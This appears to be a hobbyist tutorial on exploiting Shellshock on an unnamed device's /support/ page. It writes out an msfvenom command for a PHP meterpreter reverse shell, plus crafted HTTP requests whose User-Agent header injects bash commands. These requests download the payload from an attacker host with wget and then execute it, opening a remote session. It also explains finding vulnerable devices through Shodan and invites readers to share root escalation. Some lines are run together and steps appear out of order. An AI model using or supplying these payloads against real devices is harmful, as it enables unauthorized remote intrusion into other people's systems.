Start with the payload:
msfvenom -p php/meterpreter/reverse_tcp lport=4444 lhost=1.2.3.4 >msf.txtNow upload msf.txt to your web server. After the payload is uploaded open metasploit and
use exploit/multi/handlerThat should start up our listener. Now we need to open up burp and use the repeater. Enter the following for the request:
set payload php/meterpreter/reverse_tcp
run
Also don't forget to configure the target correctly. Hit go and wait a few seconds and you should see some wget output and if all went well you should now have uploaded msf.php to the /tmp/ dir of the device. Now we just need to execute it. For this we use burp again. This time put this in the request:GET /support/ HTTP/1.1Host: 5.6.7.8User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; wget http://1.2.3.4/msf.txt -O /tmp/msf.php2>&1;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alive
This time when you hit Go, and your ports are forwarded correctly, you should be able to go back to our msfconsole window and see a session has opened. You wont have root at this point but you can still do a lot of fun stuff. You can find some of these devices on Shodan by searching for "hipname=". If anyone figures out how to get root please share :) Enjoy!GET /support/ HTTP/1.1Host: 5.6.7.8User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; php /tmp/msf.php;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alive
*Count of vulnerable devices taken from Shodan search results, not actual testing.
**I did not test it but you could try to use linux/x86/exec payload in bash bug exploit module to deploy and execute. This would allow you to keep it all in metasploit.
